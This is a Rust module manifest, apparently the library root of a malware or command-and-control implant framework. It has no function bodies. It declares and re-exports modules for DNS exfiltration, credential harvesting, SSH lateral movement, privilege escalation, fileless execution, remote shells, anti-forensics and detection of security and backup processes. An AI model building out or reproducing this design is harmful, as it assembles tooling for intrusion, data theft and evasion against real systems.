pub mod anti_analysis;
pub mod anti_forensics;
pub mod arena_mgr;
pub mod c2_bridge;
pub mod c2_channels;
pub mod channel_rotator;
pub mod chaos;
pub mod chrononaut;
pub mod cloud_worker;
pub mod comms;
pub mod config;
pub mod consensus;
pub mod crypto;
pub mod death_dance;
pub mod did;
pub mod exfil;
pub mod exploits;
pub mod federation;
pub mod fileless;
pub mod guardian;
pub mod hades_gate;
pub mod hibernation;
pub mod hive_scale;
pub mod hivemind;
pub mod homomorphic;
pub mod honeycomb;
pub mod identity;
pub mod io_uring_ops;
pub mod ipc_contract;
pub mod kerberos;
pub mod lateral;
pub mod ldc;
pub mod leech;
pub mod marl_online;
pub mod ml;
pub mod nectar;
pub mod obfstr;
pub mod opsec;
pub mod panal;
pub mod pheromone;
pub mod phoenix;
pub mod platform_layer;
pub mod privesc;
pub mod propaganda;
pub mod reactive_llm;
pub mod remote_shell;
pub mod royal_jelly;
pub mod saboteur;
pub mod seer;
pub mod shared_arena;
pub mod smb;
pub mod smoke_signals;
pub mod stack_spoof;
pub mod stigmergy;
pub mod swarming;
pub mod syscalls;
pub mod system_info;
pub mod telemetry;
pub mod tournament;
pub mod utils;
pub mod waggle_dance;
pub mod whispernet;

pub use anti_analysis::AntiAnalysis;
pub use cloud_worker::{CloudCredential, CloudProvider, CloudResult, CloudWorker};
pub use comms::HiveChamber;
pub use consensus::ConsensusEngine;
pub use crypto::{decrypt_chacha20, decrypt_model, derive_key, derive_seed, encrypt_chacha20};
pub use exfil::{dns_exfiltrate, ExfilScheduler};
pub use fileless::MemfdBinary;
pub use identity::AgentIdentity;
pub use lateral::{discover_hosts, exec_ssh, harvest_credentials};
pub use ldc::{Decision, Message, Payload, Role, SignedMessage, Value};
pub use privesc::{ExploitTracker, PrivEscResult, PrivEscVector, RiskLevel};
pub use remote_shell::{
    execute_command, execute_command_with_timeout, CommandResult, ExecSession, WsShell,
};
pub use system_info::{
    is_backup_process, is_edr_process, LinuxInfo, PlatformInfo, SystemInfo, WindowsInfo,
};
